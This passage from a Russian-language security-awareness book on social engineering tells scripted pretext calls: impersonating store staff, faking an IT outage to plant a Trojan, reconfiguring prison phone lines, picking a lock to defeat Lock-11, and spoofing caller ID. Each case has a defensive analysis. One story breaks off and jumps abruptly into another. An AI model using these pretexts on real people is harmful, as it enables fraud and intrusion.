служащим компании. И если информация никогда не оглашалась, кто мог отказать в помощи сотруднику компании, выполняющему тяжелую работу? Она сочувствовала ему, у нее самой были нелегкие дни на работе, и она немного нарушила правила, чтобы помочь коллеге с решением проблемы. Она сообщила ему действующий номер и адрес для каждой из кабельных пар.

Сообщение от Hacker Place

В человеческой натуре заложено доверять, особенно когда просьба кажется обоснованной. Социальные инженеры используют это, чтобы эксплуатировать свои жертвы и достичь своих целей.

Анализ обмана

Вы заметите, что в этих историях знание терминологии компании, ее структуры — различных офисов и подразделений, что делает каждое из них и какой информацией владеет — часть ценного багажа приемов успешного социального инженера


ВНУШАЯ ДОВЕРИЕ


Не стоит зазнаваться и верить в то, что все на самом деле полные идиоты, готовые, даже жаждущие, отдать каждый секрет. Социальный инженер знает, что это неправда. Почему атака социальной инженерией так успешна? Это так, не потому что люди глупы или им не хватает здравого смысла… Просто мы, как люди, полностью уязвимы перед обманом, поскольку люди могут изменить доверие, если манипулировать определенным образом.

Социальный инженер ожидает подозрение и недоверие, и он всегда подготавливается, чтобы недоверие превратить в доверие. Хороший социальный инженер планирует атаку подобно шахматной игре, предполагая вопросы, которые цель атаки может задать, так что у него могут быть готовы подходящие ответы.

Одна из его основных техник включает создание чувства доверия со стороны его жертв. Как он заставляет Вас верить ему? Поверьте мне, может.


Запомните: Доверие: ключ к обману


Чем естественней социальный инженер общается с жертвой, тем больше он ослабляет подозрение. Когда у людей нет причины для подозрений, социальному инженеру становится легко приобрести доверие жертвы.

Как только он получает ваше доверие, разводной мост опускается, и дверь замка распахивается, и он может зайти и взять ту информацию, что он хочет.


Одноцентовый сотовый телефон

Многие люди оглядываются пока не найдут лучшую сделку; социальные инженеры не ищут лучшую сделку, они ищут путь, чтобы сделать сделку выгоднее. Например, иногда компания запускает маркетинговую кампанию, так что вы не можете пропустить ее, пока социальный инженер смотрит на предложение и гадает, как он может улучшить сделку.

Недавно, у национальной сотовой компании была акция: предлагали новый телефон за один цент, если вы подпишете контракт.

Очень много людей обнаружило слишком поздно, что есть много вопросов, которые предусмотрительный покупатель должен спрашивать прежде, чем подписаться на контракт сотовой связи: план услуг аналоговый, цифровой, или комбинированный; количество бесплатных минут в месяц; включена ли в цену плата за роуминг, и так далее. Особенно важно, чтобы понять перед заключением контракта, на сколько месяцев или лет Вы заключаете контракт?

Одного социального инженера в Филадельфии привлек дешевый телефон, предложенный сотовой компанией в контракте, но он ненавидел тарифные планы, которые были в контракте. Не проблема. Вот один путь, по которому он мог управлять ситуацией.

Первый звонок: Тед

Сначала, социальный инженер звонит в магазин электроники в West Girard.

«Электронный Город. Это Тед.»

"Привет, Тед. Это — Адам. Слушай, Я пару дней назад говорил с продавцом о сотовом телефоне. Я сказал ему что перезвоню, когда решу, какой тарифный план выбрать, и я забыл его имя. Кто тот парень, который работал в этом отделе на днях?

«Тут не один продавец. Это был Вильям?»

«Я не уверен. Может быть, это было Вильям. Как он выглядит?» «Высокий худой парень».

«Я думаю, это был он. Повторите пожалуйста, как его фамилия?»

«Хедли Х—Е—Д—Л—И»

«Да, вроде это был он. Когда он снова будет?»

Я не знаю его расписание на эту неделю, но на вторую смену люди приходят около пяти".

«Хорошо. Я проговорю с ним сегодня вечером. Спасибо, Тед.»

Второй Звонок: Кети

Следующий звонок — в магазин той же самой компании на North Broad Street.

«Привет, Электронный Город. Кети на проводе, чем могу вам помочь?»

«Кети, Привет. Это — Вильям Хедли, из магазина на West Girard. Как идут сегодня дела?»

«Неважно, а что случилось»

«У меня есть клиент, который пришел по акции “сотовый телефон за один цент”. Знаешь что я имею в виду?»

«Знаю. Я продала пару таких на прошлой неделе».

«У вас еще есть телефоны, которые идут с этой акцией?»

«Получили кучу таких».

«Прекрасно. Я только что продал один клиенту. Парень заплатил кредит; мы подписали с ним контракт. Телефон оказался бракованным, и у нас больше нет ни одного телефона. Я так смущен. Вы можете мне помочь? Я пошлю его в ваш магазин, чтобы приобрести телефон. Вы можете продать ему телефон за один цент? И он обязан перезвонить мне, как только он получит телефон, чтобы я смог ему рассказать про акцию».

«Да, конечно. Пришлите его сюда».

«Хорошо. Его имя Тед. Тед Янеси.»

Когда парень, который назвал себя Тедом Янеси, появился в магазине на улице North Broad St. Кети выписала счет и продала сотовый телефон за один цент, так как ее просил коллега. Она попалась на трюк мошенника.

Когда пришло время заплатить, покупатель не имел ни цента в кармане, так что он добрался до небольшой тарелки с мелочью у кассового аппарата, взял один, и дал девушке за регистрацию. Он получил телефон, не платя ни одного цента за это.

Теперь он может прийти в другую компанию, которая использует телефоны того же стандарта и заказать себе другой тарифный план без контрактных обязательств.

Анализ обмана

Людям естественно доверять в более высокой степени коллеге, который что- то просит, и знает процедуры компании, жаргон. Социальный инженер в этом рассказе воспользовался преимуществом, узнав детали компании, выдавая себя за служащего компании, и прося помощи в другом филиале.

Это случается между филиалами магазинов и между отделами в компании, люди физически разделяются и общаются по телефону, никогда не встречая друг друга.


«РАЗРЕШИТЕ ВАМ ПОМОЧЬ»

Мы все благодарны, когда кто-нибудь со знанием, опытом и желанием помочь приходит и предлагает помочь с проблемами. Социальный инженер понимает это, и знает, как извлечь из этого выгоду.

Он также знает как создать вам проблему… а потом сделать вас благодарными, когда он решит проблему… и на вашей поиграв на вашем чувстве благодарности, извлечет из вас информацию или попросит оказать небольшую услугу, которая оставит вашу компанию (или вас лично) в гораздо более плохом состоянии после встречи. И вы можете даже не узнать, что вы потеряли что-то ценное.

Есть несколько типичных способов, которыми социальные инженеры пытаются «помочь».


Неполадки в сети


Дата/Время: Понедельник, 12 февраля, 15:25

Место: Офис кораблестроительной фирмы Starboard.

Первый звонок: Том ДиЛэй

«Том ДиЛэй, бухгалтерия».

«Здравствуй, Том, это Эдди Мартин, отдел техпомощи, мы пытаемся найти причины неисправности компьютерной сети. Были ли у кого-либо в вашей группе проблемы с подключением?»

«Нет, я не в курсе».

«А у тебя?»

«Нет, все вроде в порядке».

«Окей, это хорошо. Мы звоним людям, на кого это может повлиять, потому что важно всех проинформировать заранее, если будут внезапные отключения».

«Это звучит нехорошо. Вы думаете, это может случиться?»

«Надеюсь, что нет, но если что случится, позвонишь?»

«Можешь не сомневаться».

«Похоже, отсутствие связи будет для тебя проблемой».

"Бесспорно ".

«Так что пока мы над этим работаем, я дам тебе свой сотовый. Тогда ты сможешь мне все сообщить при первой необходимости».

«Отлично, говори».

«Номер 555 867 5309».

«555 867 5309. Записал. Спасибо. А как тебя зовут?»

"Эдди. И последнее. Мне надо знать, к какому порту подключен твой компьютер. Посмотри, там где-то есть наклейка с надписью «Порт N…»

«Сейчас… Нет, не вижу ничего подобного».

«Ладно, тогда сзади компьютера. Ты узнаешь сетевой провод?»

«Да».

«Тогда посмотри, где он подключен. Там должна быть табличка».

«Подожди секунду. Сейчас. Мне придется туда пролезть, чтобы ее увидеть. Вот. На ней написано Порт 6-47.»

«Отлично, как раз как записано про тебя. Просто проверяю».

Второй звонок: Человек из техобслуживания

Через пару дней поступил звонок в отдел локальной сети.

«Здравствуй, это Боб, я в офисе Тома ДиЛэя из бухгалтерии. Мы пытаемся найти неисправность в кабеле. Надо отключить порт 6-47.»

Человек из техобслуживания сказал, что это будет сделано за несколько минут, и попросил перезвонить, когда потребуется включить порт.

Третий звонок: Помощь от врага.

Примерно через час, человек, представившийся как Эдди Мартин, ходил по магазинам в Circuit City, и вдруг зазвенел телефон. Он посмотрел номер звонящего, узнал, что он из кораблестроительной компании поспешил в спокойное, тихое место, прежде чем ответить.

«Отдел техпомощи, Эдди.»

«О, здравствуй, Эдди. Проблемы со связью. Ты где»?

«Я, э, в кабельной комнате. Кто это»?

«Это Том ДиЛэй. Я рад, что нашел тебя. Может, помнишь, ты мне звонил недавно? Мое соединение не работает, как ты и говорил, и я немножко паникую».

«Да, у нас сейчас отключена куча людей. Но мы все поправим к концу дня. Сойдет»?

«НЕТ! Черт, я серьезно отстану, если я буду отключен столько времени. Никак нельзя побыстрее»?

«Насколько это важно?»

«Пока я могу заняться другими делами. Может, ты все поправишь за полчаса?»

«ПОЛЧАСА? Ну ладно, я брошу то, чем я занимаюсь, и попытаюсь сделать что-нибудь для тебя».

«Я очень благодарен, Эдди!» Четвертый звонок: Попался! Через 45 минут…

«Том? Это Эдди. Проверь свое подключение». Через несколько минут:

«Отлично, оно работает. Великолепно».

«Хорошо, что я смог тебе помочь».

«Да, спасибо большое».

«Слушай, если ты хочешь быть уверен, что твое подключение больше не прервется, надо поставить одну программку».

«Сейчас не лучшее время».

«Я понимаю… Но зато не будет проблем в следующий раз, когда произойдет сбой сети».

«Ну… только если это займет несколько минут».

«Вот что надо сделать…»

Эдди рассказал Тому, как скачать маленькое приложение с одного сайта. После того, как программа скачалась, Эдди сказал запустить ее двойным щелчком мыши. Он попробовал и сказал:

«Не работает. Она ничего не делает».

«Ужас. Наверно, что-то не так с программой. Давай от нее избавимся, и попробуем еще раз в другое время». Он рассказал Тому, как безвозвратно удалить программу.

Затрачено времени: 12 минут.

Троянский конь — программа, содержащая хулиганский или вредоносный код, созданная для того, чтобы повредить компьютер или файлы жертвы, или получить данные из компьютера или сети. Некоторые трояны прячутся в ОС компьютера, и смотрят за каждой нажатой клавишей или действием, или принимают команды через сетевое соединение с целью выполнения некоторой функции, и это происходит без ведома жертвы.

И это было еще не все. Он мог вернуться в любое время, и просмотреть электронную почту и личные памятки служащих компании, сделав поиск текста, который сможет показать любые лакомые кусочки информации. Поздно, тем же вечером, когда он обманом заставил свою жертву установить троянского коня, Бобби выкинул свой сотовый в помойку. Конечно, он был осторожен, и очистил память, а потом вытащил батарейку, прежде чем выбросить его — ему меньше всего было надо, чтобы кто-нибудь случайно набрал номер, и телефон зазвонил.

Анализ обмана

Атакующий плетет сети для того, чтобы убедить жертву, что у него есть проблема, которая на самом деле не существует. Или, как в данном случае, проблема, которой пока нет, но атакующий знает, что она будет , так как он ее и создаст. Он представил себя человеком, способным найти решение.

Организация этого вида атаки особенно привлекательна для атакующего. Из- за того, что все было спланировано заранее, когда «цель» узнает, что у него есть проблема, он звонит и умоляет о помощи. Атакующий просто сидит и ждет, когда зазвенит телефон — эта тактика более известна, как обратная социальная инженерия . Атакующий, который может заставить жертву позвонить ему , получает мгновенное доверие: «если я позвоню кому- нибудь, кто, как мне кажется, из технической поддержки, я не буду просить его подтвердить свою личность». В этот момент можно считать, что атакующий уже победил.

Удаленная командная строка — Неграфический интерфейс, который принимает текстовые команды для выполнения определенных функций или запуска программ. Атакующий, который эксплуатирует технические уязвимости или может установить Троянского Коня на компьютер жертвы, получает доступ к удаленной командной строке.

Обратная социальная инженерия — Социально инженерная атака, в которой атакующий создает ситуацию, где жертва сталкивается с проблемой, и просит атакующего о помощи. Другая форма обратной социальной инженерии переводит стрелки на атакующего. Цель распознает атаку и

использует психологические приемы, чтобы узнать как можно больше информации об атакующем, чтобы бизнес мог направленно охранять свое имущество.

Сообщение от Hacker Place

Если незнакомый человек окажет вам услугу, а потом попросит сделать что- либо, не делайте этого, не обдумав хорошенько то, что он просит.

В афере, подобной этой, социнжинер пытается выбрать такую цель, у которой ограниченные знания в области использования компьютеров. Чем больше он знает, тем больше вероятность того, что он что-то заподозрит, или поймет, что его пытаются использовать. Такой человек, который мало знает о технике и процедурах, «рабочий, бросивший вызов компьютеру», скорее всего, подчинится. Очень вероятно, что он попадет на уловку вроде «Просто скачайте эту программу», потому что даже не подозревает, сколько вреда может принести подобное ПО. Помимо этого, зачастую он не понимает ценности информации, которой он рискует.

Один из наиболее мощных трюков социального инженера включает

«перевод стрелок». Это именно то, что вы видели в этой главе. Социальный инженер создает проблему, а потом чудесным образом ее решает, обманом заставляя жертву предоставить доступ к самым охраняемым секретам компании. А ваши сотрудники попадутся на эту уловку? А вы позаботились о создании и применении специальных правил безопасности, которые могли бы предотвратить такое?


«НЕ МОГЛИ БЫ ВЫ ПОМОЧЬ?»


Вы знаете, как социальные инженеры обманывают людей, предлагая им свою помощь. Другой излюбленный подход основан на обратном: социальный инженер делает вид, что нуждается в помощи другого человека. Мы можем сочувствовать людям в затруднительном положении, и подход оказывается эффективным снова и снова, позволяя социальному инженеру достигнуть своей цели.


Чужак


История в главе 3 показала, как атакующий может служащего сообщить свой (табельный) номер. В этой истории применяется другой подход, чтобы добиться того же результата, и показывает, как атакующий может им воспользоваться.

Наравне с Джонсами

В Силиконовой долине есть некая мировая компания, название которой упоминаться не будет. Отделы сбыта и другие подразделения,

расположенные по всему миру, соединены со штаб-квартирой компании посредством глобальной сети (WAN). Взломщик, проворный малый по имени Брайан Аттерби (Brian Atterby), знал, что почти всегда легче проникнуть в сеть в одном из отдаленных мест, где уровень безопасности должен быть ниже, чем в головном офисе.

Взломщик позвонил в офис в Чикаго и попросил соединить с мистером Джонсом. Секретарь в приемной спросила, знает ли он имя мистера Джонса; он ответил: «Оно где-то здесь, я ищу его. Сколько у вас работает Джонсов?». Она сказала: «Три. В каком он подразделении?» Он сказал: «Если вы зачитаете мне имена, может, я вспомню его».

отдела ремонта и хотел узнать номер центра RCMAC, который обслуживал зону с названным им с кодом и префиксом, и он оказался тем же офисом, обслуживающим все линии тюрьмы. Эта была самая обычная услуга, предоставляемая техникам на работе, нуждающимся в помощи, и служащий незамедлительно дал номер.

Он позвонил в RCMAC, назвал «телефонное» имя и опять сказал, что он из отдела ремонта. Когда женщина ответила, Джонни спросил: «Установлен ли на номере deny terminate»?

«Да» — сказала она.

"Тогда это объясняет, почему клиент не может получать звонки… "— сказал Джонни. «Слушай, окажи мне, пожалуйста, услугу. Надо изменить свойство линии или убрать запрет входящих, ладно?» Возникла пауза, пока она проверяла другую компьютерную систему, есть ли приказ, разрешающий изменение. «Этот номер должен запрещать входящие звонки. Нет приказа об изменении».

«Тогда это ошибка… Мы должны были передать приказ вчера, но представитель счета заболела, и забыла попросить кого-либо отнести приказ за нее. Так что теперь клиентка бурно протестует по этому поводу».

После секундной паузы женщина обдумала просьбу, ведь просьба необычна и противоречит стандартным операциям, и сказала «Ладно». Он слышал, как она печатает, внося изменения. И через несколько секунд, все было сделано. Лед тронулся, между ними образовалось нечто, похожее на сговор. Поняв отношение женщины и ее желание помочь, Джонни, не колеблясь, решил попробовать все сразу. Он сказал: «У тебя есть еще пару минут, чтобы помочь мне?»

«Да, — она ответила, — Что вам надо?»

«У меня есть еще пару линий, принадлежащих той же клиентке, и на всех та же проблема. Я прочту вам номера, чтобы вы проверили, поставлен ли на них запрет входящих — хорошо?» Она согласилась.

Через несколько минут, все линии были «починены» на прием входящих звонков.

Поиск Гондорффа

Теперь ему надо было узнать, в каком отделении находится Гондорфф. Это информация, которую люди, содержащие места заключения и тюрьмы, точно не захотят предоставить посторонним. Снова Джонни должен был положиться на свои навыки в социальной инженерии.

Он решил позвонить в тюрьму другого города — Майами, но любой другой бы подошел, и сказал, что он звонит из Нью-йоркской тюрьмы. Он попросил кого-нибудь, кто работает с компьютером центрального бюро, содержащего информацию обо всех заключенных, содержащихся в тюрьмах по всей стране.

Когда человек подошел к телефону, Джонни заговорил на своем Бруклиновском акценте. «Привет, — он сказал, — Это Томас из FDC (Federal detention center), Нью-Йорк. Наше подключение с центральным бюро не работает, не могли бы вы посмотреть расположение преступника для меня, мне кажется, он может быть в вашем учреждении», — и он сказал имя Гондорффа и регистрационный номер.

«Нет, он не здесь,» — сказал парень через несколько секунд. «Он в исправительном центре в Сан-Диего».

Джонни притворился удивленным. «Сан-Диего! Его должны были переправить в Майами на судебном самолете на прошлой неделе! Мы говорил об одном человеке — какая у него дата рождения?»

«12/3/60» сказал мужчина, прочитав с экрана.

«Да, это тот парень. В каком отделении он находится?»

«Он в Северном-10», сказал мужчина, беззаботно ответив на вопрос, не смотря на то, что не было уважительной причины, зачем эта информация понадобилась работнику в Нью-Йорке.

Сейчас у Джонни были телефоны, включенные на прием входящих, и знал, в каком отделении находится Гондорфф. Теперь надо узнать, какой номер подключен к отделению Северное-10.

Это — сложная часть. Джонни позвонил на один из номеров. Он знал, что звонок телефона будет выключен; никто не узнает, что он звонит. Так что он сидел и читал туристический справочник Величайшие Города Европы Фодора (Fodor's Europe's Great Cities), слушая постоянные гудки в телефоне, пока наконец-то кто-то не поднял трубку. Заключенный на другом конце линии, конечно, будет пытаться добраться до своего адвоката, назначенного судом. Джонни подготовил ответ. "Офис Общественных Защитников, " — он объявил.

Когда мужчина попросил своего адвоката, Джонни сказал: «Я посмотрю, свободен ли он. Вы из какого отделения?» Он записал ответ мужчины, щелкнул по hold, вернулся через полминуты и сказал: «Он сейчас в суде, вам придется перезвонить позднее».

Он потратил большую часть утра, но могло быть и хуже; его четвертая попытка оказалась Северной-10. Теперь Джонни знал номер, соединенный с ООЗ в отделении Гондорффа.

Синхронизируй свои часы

Теперь надо передать сообщение Гондорффу, когда ему надо поднять трубку, подключенную к Офису Общественных Защитников. Это было проще, чем может показаться.

Джонни позвонил в тюрьму, используя «официально — звучащий» голос, представился как сотрудник, и попросил, чтобы его соединили с Северным-

  1. Звонок соединили. Когда надзиратель поднял там трубку, Джонни обманул его, используя внутреннюю аббревиатуру для Приема и Выпуска

    (Recieving and Discharge), отдела, который работает с новыми и отбывающими заключенными: «Это Томас из П&В,» сказал он. «Я должен поговорить с заключенным Гондорффом. У нас есть некоторые его вещи, и он должен сообщит нам адрес, куда нам их лучше отправить. Не могли бы вы его позвать к телефону?»

    Джонни слышал, как охранник кричит через комнату. Через несколько нетерпеливых минут, он услышал знакомый голос на линии.

    Джонни сказал ему: «не говори ничего, пока я не объясню тебе, что я задумал». Он рассказал все предисловие так, чтобы казалось, будто Джонни обсуждает, куда он хочет доставить вещи. Потом он сказал: «если ты сможешь добраться до телефона офиса общественных защитников сегодня днем — не отвечай. А если не сможешь, назови время, когда ты сможешь быть там». Гондорфф не ответил. Джонни продолжил: «Хорошо. Будь там в час. Я тебе позвоню. Подними трубку. Если он начнет звонить в Офис Общественных Защитников, нажимай на сброс каждые 20 секунд. Не переставай пробовать, пока не услышишь меня на другом конце».

    В час дня, когда Гондорфф поднял трубку, Джонни уже ждал его. У них была живая, приятная, неторопливая беседа, начавшая серию подобных звонков, чтобы спланировать аферу, которая принесет деньги на оплату легальных счетов — свободных от правительственной завесы.

    Анализ обмана

    Этот эпизод показывает основной пример того, как социальный инженер может сделать то, что кажется невозможным, обманывая нескольких людей, каждый из которых делает нечто, кажущееся непоследовательным. На самом деле, каждое действие дает маленький кусочек головоломки, пока афера не закончена.

    Первая сотрудница телефонной компании думала, что отдает информацию из гособслуживания.

    Следующая сотрудница телефонной компании знала, что она не должна изменять класс линии без соответствующего приказа, но все равно помогла дружелюбному мужчине. Это дало возможность звонить во все 10 отделений тюрьмы.

    Для мужчины из исправительной колонии в Майами, просьба помочь другому федеральному учреждению, у которого проблемы с компьютером, звучала абсолютно убедительной. И даже если у него не было другой причины узнать номер отделения, почему бы не ответить на вопрос?

    А охранник в Северном-10, поверивший, что собеседник действительно из этого же заведения, звонит по официальному делу? Это была полностью приемлемая просьба, так что он позвал заключенного Гондорффа к телефону. Совсем не серьезное дело.

    Серия хорошо спланированных рассказов, которые складываются в единую цепь.


    Легкие деньги


    Когда а впервые познакомился с компьютерами в старших классах школы, нам приходилось подключаться к одному центральному миникомпьютеру DEC PDP 11, расположенному в пригороде Лос-Анджелеса, который использовали все школы Л.А. Операционная система на компьютере называлась RSTS/E, и эта была первая операционная система, с которой я научился работать.

    В то время, в 1981 году, DEC устраивали ежегодную конференцию для своих пользователей, и в этом году конференция пройдет в Л.А. В популярном журнале для пользователей этой операционной системы было объявление о новой разработке по безопасности, Lock-11. Этот продукт продвигали с хорошей рекламной кампанией, где говорилось нечто вроде: «Сейчас 3:30 утра, и Джонни с другого конца улицы нашел ваш номер дозвона, 555-0336, с 336й попытки. Он внутри, а вы в пролете. Покупайте Lock-11». Продукт, как говорилось в рекламе, был «хакероустойчивым». И его собирались показать на конференции.

    Я жаждал посмотреть на разработку. Друг старшеклассник, Винни, являвшийся моим партнером по хакингу в течение нескольких лет, впоследствии ставший государственным информатором против меня, разделял мой интерес к новому продукту DEC, и воодушевил меня на поход на конференцию с ним.

    Деньги на линии

    Мы пришли и обнаружили большой переполох в толпе около презентации Lock-11. Похоже, что разработчики ставили деньги на то, что никто не сможет взломать их продукт. Звучит как вызов, перед которым я не смог устоять.

    Мы направились прямо к стенду Lock-11, и обнаружили, что руководят там разработчики проекта; я узнал их, и они узнали меня — даже в юности у меня уже была репутация фрикера и хакера из-за большого рассказа в LA Times о моем первом контакте с властями. В статье рассказывалось, как я благодаря одним диалогам вошел посреди ночи в здание Pacific Telephone (телефонная компания — прим. переводчика), и вышел с компьютерными руководствами, прямо перед носом у их охраны. ( Похоже, что Times хотели напечатать сенсационный рассказ, и в своих целях напечатали мое имя; я был еще несовершеннолетним, и статья нарушала не только традиции, а возможно даже закон о сокрытии имен несовершеннолетних, обвиненных в правонарушении.)

    Когда Винни и я подошли, это вызвало интерес у обеих сторон. С их стороны был интерес, потому что они узнали во мне хакера, о котором читали, и были

    немного шокированы, увидав меня. Интерес с нашей стороны вызвало то, что у каждого из трех разработчиков, стоявших там, был чек на $100,

    торчавший из значка участника конференции. В сумме приз для любого, кто сможет взломать их систему, составлял $300 — и это показалось большой суммой денег для пары тинэйджеров. Мы с трудом могли дождаться того, чтобы начать.

    Lock-11 был спроектирован по признанному принципу, полагавшемуся на два уровня безопасности. У пользователя должен был быть верный идентификационный номер и пароль, но и вдобавок этот идентификационный номер и пароль будут работать, только если они введены с уполномоченного терминала, подход называемый terminal-based security (безопасность, основанная на терминалах) . Чтобы победить систему, хакеру бы понадобилось не только знание идентификационного номера и пароля, но и пришлось бы ввести информацию с правильного компьютера. Метод был хорошо признанным, и изобретатели Lock-11 были убеждены, что он будет держать плохих парней подальше. Мы решили преподать им урок, и заработать триста баксов.

    Знакомый парень, который считался гуру в RSTS/E, уже подошел к стенду раньше нас. Несколько лет назад, он был одним из тех парней, кто озадачил меня взломом внутреннего компьютера разработчиков DEC, после чего его сообщники выдали меня. Теперь он стал уважаемым программистом. Мы узнали, что он пытался взломать программу безопасности Lock-11, незадолго до того, как мы пришли, но не смог. Этот инцидент дал разработчикам еще большую уверенность, что их продукт действительно безопасен.

    Соревнование было непосредственным испытанием: ты взламываешь — ты получаешь деньги. Хороший публичный трюк … если кто-нибудь не опозорит их и заберет деньги. Они были так уверены в своей разработке, и были достаточно наглыми, что даже приклеили распечатку на стенд с номерами учетных записей и соответствующих паролей в системе. Но не только пользовательские учетные записи, но и все привилегированные.

    Это было гораздо менее приятно, чем звучит. С таким видом настроек, я знал, что каждый терминал подключен к порту на самом компьютере. Это — не ракетная физика, чтобы догадаться, что они установили пять терминалов в зале для конференций, и посетитель мог войти только как непривилегированный пользователь — это значит, что подключения были возможны только с учетных записей с правами системного администратора. Похоже, что было только два пути: обойти систему безопасности, для предотвращения чего и был рассчитан Lock-11, или как-нибудь обойти программное обеспечение, как разработчики даже не представляли.

    Terminal-based security — Безопасность, частично основанная на идентификации конкретного используемого компьютера; этот метод был особо популярен с главными компьютерами IBM.


    Вызов принят

    Мы с Винни уходили и говорили о конкурсе, и я придумал план. Мы невинно ходили вокруг, поглядывая на стенд с расстояния. Во время обеда, когда толпа разошлась, и трое разработчиков решили воспользоваться перерывом и пошли вместе купить себе что-нибудь поесть, оставив женщину, которая могла быть женой или девушкой одного из них. Мы прогуливались туда- сюда, и я отвлекал женщину, разговаривал с ней о разных вещах: «давно ли ты работаешь в компании?», «какие еще продукты вашей компании имеются в продаже» и т.д.

    Тем временем, Винни, вне поля ее зрения, приступил к работе, используя навыки, которые мы развивали. Помимо очарованности взломом компьютеров и моего интереса к магии, мы были заинтересованы в обучении открытия замков. Когда я был маленьким, я прочесывал полки подпольного книжного магазина в Сан-Франциско, в котором были тома о вскрытии замков, вылезании из наручников, создании поддельных удостоверений — и о других вещах, о которых дети не должны знать.

    Винни, как и я, тренировался вскрывать замки до тех пор, пока у нас не стало хорошо получаться с замками магазинов с железом. Было время, когда я устраивал розыгрыши — находил кого-нибудь, кто использовал 2 замка для безопасности, вскрывал их и менял местами, и это очень удивляло и расстраивало, если он пытался открыть их не тем ключом.

    В выставочном зале, я продолжал отвлекать девушку, пока Винни подполз сзади будки, вскрыл замок в кабинет, где стоял их PDP-11 и кабели. Назвать кабинет запертым — это почти шутка. Он был защищен тем, что слесари называют wafer lock(вафельный замок), известный как легко открываемый, даже для таких неуклюжих любителей взламывать замки как мы.

    Винни понадобилась примерно минута, чтобы открыть замок. Внутри, в кабинете он обнаружил то, что мы не любили: полосы портов, для подключения пользовательских терминалов, и один порт, который называется консольным терминалом. Этот терминал использовался оператором или системным администратором, чтобы управлять всеми компьютерами. Винни подключил кабель, идущий от консольного порта к одному из терминалов, находящихся на выставке.

    Это означало, что теперь этот терминал воспринимается как консольный терминал. Я сел за переподключенную машину, и использовал пароль, который так смело предоставили разработчики. Поскольку Lock-11 определил, что я подключаюсь с уполномоченного терминала, он дал мне доступ, и я был подключен с правами системного администратора. Я

    пропатчил операционную систему, изменил ее так, что можно будет подключиться с любого компьютера на этаже в качестве привилегированного пользователя.

    Когда я установил свой секретный патч, Винни вернулся к работе, отключил терминальный кабель и подключил его туда, где он был первоначально. Он еще раз вскрыл замок, на этот раз, чтобы закрыть дверь кабинета.

    Я сделал листинг директорий, в поисках папок и программ, связанных с Lock- 11, и случайно наткнулся на кое-что шокирующее: директория, которая не должна была быть на этой машине. Разработчики были слишком уверены, что их программное обеспечение непобедимо, что они даже не побеспокоились о том, чтобы убрать исходный код их нового продукта. Я передвинулся к соседнему печатающему терминалу, и начал распечатывать порции исходного кода на длинных листах зелено-полосатой бумаги, используемой компьютерами в те времена.

    Винни едва успел закрыть замок и вернуться ко мне, когда парни вернулись с обеда. Они застали меня, сидящего возле компьютера бьющего по клавишам, а принтер продолжал печатать. «Что делаешь, Кевин?»— спросил один из них.

    "А, просто печатаю исходники, “ я сказал. Они предположили, что я шучу. Пока не посмотрели на принтер и не увидели, что это действительно тот ревностно охраняемый исходный код их продукта.

    Они не поверили, что я действительно подключился как привилегированный пользователь. «Нажми Control-T,» — приказал один из разработчиков. Я нажал. Надпись на экране подтвердила мое утверждение. Парень ударил рукой по своему лбу, когда Винни говорил «Триста долларов, пожалуйста». Сообщение от Hacker Place

    Вот еще один пример того, как умные люди недооценивают противника. А как насчет вас — вы уверены, что можно поставить $300 на ваши охранные системы, против взломщика? Иногда обход вокруг технологических устройств не такой, какой вы ожидаете.

    Они заплатили. Мы с Винни ходили по выставке оставшуюся часть дня со стодолларовыми чеками, прикрепленными к нашим значкам конференции. Каждый, что видел чеки, знал, что они означают.

    Конечно, мы с Винни не победили их программу, и если разработчики установили бы хорошие правила в конкурсе или использовали бы действительно безопасный замок, или присматривали за своим оборудованием более внимательно, то им бы не пришлось терпеть унижение того дня — унижение из-за парочки подростков.

    Позже, я узнал, что команде разработчиков пришлось зайти в банк, чтобы получить наличные: эти стодолларовые чеки — все деньги, взятые с собой, которые они собирались тратить.

    УМНЫЕ МОШЕННИКИ


    Теперь вы выяснили, что когда незнакомец звонит с запросом на чувствительную информацию или на что-то, что может представлять ценность для атакующего, человек, принимающий звонок, должен быть обучен требовать телефонный номер вызывающего и перезванивать чтобы проверить, что человек на самом деле есть тот, за кого себя выдает — сотрудник компании, или сотрудник партнера по бизнесу, или представитель службы технической поддержки от одного из ваших поставщиков, например. Даже когда компания установила процедуру, которой сотрудники тщательно следуют для проверки звонящих, сообразительные атакующие все еще способны использовать набор трюков для обмана своих жертв, заставляя поверить что они те, за кого себя выдают. Даже сознательные в отношении безопасности сотрудники могут стать обманутыми методами, такими как нижеприведенные.


    Несоответствующий “Caller ID”


    Любой кто хоть раз получал звонок на сотовой телефон, наблюдал в действии опцию, называемую “caller ID”(дословно “Идентификатор Вызывающего”) — этот знакомый дисплей, отображающий телефонный номер звонящего. В рабочей обстановке эта функция предлагает возможность рабочему одним взглядом оценить, от знакомого ли сотрудника идет вызов или же откуда-то вне компании.

    Много лет назад некие амбициозные телефонные фрикеры обнаружили для себя все прелести caller ID еще даже до того как телефонная компания публично стала предлагать подобный сервис абонентам. Они изрядно повесилились, одурачивая людей ответами по телефону и приветствуя вызывающего по имени, в то время как тот даже не успевал сказать ни слова. Просто когда вы думаете что подобное безопасно, практика удостоверения личности путем доверия тому что вы видите — то, что появляется на дисплее caller ID — это именно то, на что атакующий может расчитывать.

    Звонок Линды

    День/время: Вторник, 23 июля, 15:12

    Место: “Офисы Финансового Отдела, Авиакомпания Starbeat”

    Телефон Линды Хилл зазвонил когда она записывала заметку для босса. Она взглянула на дисплей caller ID, который показывал что звонок исходил из офиса корпорации в Нью Йорке, но от кого-то по имени Виктор Мартин — имя она не узнала.

    Она подумала дождаться пока звонок переключится на автоответчик, так что ей не придется отрываться от мысли заметки. Но любопытство взяло верх.

    Она подняла трубку и звонящий представился и сказал что он из отдела рекламы и работает над некоторым материалом для управляющего компании. “Он на пути к деловой встрече в Бостоне с кем-то из банкиров. Ему требуется первоклассный финансовый отчет на текущий квартал,” сказал он. “И еще одна вещь. Еще ему нужны финансовые прогнозы на проект Апачи,” добавил Виктор, используя кодовое название продукта, который был одним из главных релизов этой весной.

    Она попросила его электронный адрес, но он сказал что у него проблема с получением электронной почты и над этим работает служба технической поддержки, поэтому не могла бы она использовать факс взамен? Она сказала что это тоже подойдет, и он дал дополнительный внутренний код для его факс-машины.

    Она отослала факс несолькими минутами позже.

    Но Виктор не работал в отделе рекламы. К слову сказать, он даже в компании-то не работал.

    История Джека

